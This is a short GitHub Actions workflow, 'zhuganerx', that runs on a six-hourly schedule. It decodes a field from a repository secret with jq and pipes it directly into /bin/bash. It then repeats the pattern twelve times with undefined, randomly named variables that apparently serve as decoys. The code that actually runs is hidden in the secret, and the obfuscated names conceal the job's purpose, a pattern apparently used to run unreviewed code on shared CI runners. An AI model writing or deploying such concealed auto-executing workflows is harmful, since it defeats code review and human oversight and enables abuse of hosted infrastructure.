name: zhuganerx

on:
  workflow_dispatch:
  schedule:
    - cron: '6 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhuganerx
        env:
          ht012: ${{ secrets.ht012 }}
        run: |
          echo $ht012 | jq -r .tfyc32757 | /bin/bash
          echo $sukv93 | jq -r .yo78 | /bin/bash
          echo $l3778 | jq -r .lqhs49253 | /bin/bash
          echo $kdutk53711 | jq -r .ujkky26 | /bin/bash
          echo $ogkpq7 | jq -r .bul3594 | /bin/bash
          echo $v7258 | jq -r .hjb3 | /bin/bash
          echo $rmosv0 | jq -r .bu89 | /bin/bash
          echo $epzo2942 | jq -r .zkt9 | /bin/bash
          echo $bb22313 | jq -r .jop45599 | /bin/bash
          echo $yrvab49589 | jq -r .xis71 | /bin/bash
          echo $ybn61576 | jq -r .ktthm3883 | /bin/bash
          echo $mmzb4653 | jq -r .um34 | /bin/bash
          echo $zfye7 | jq -r .u2573 | /bin/bash

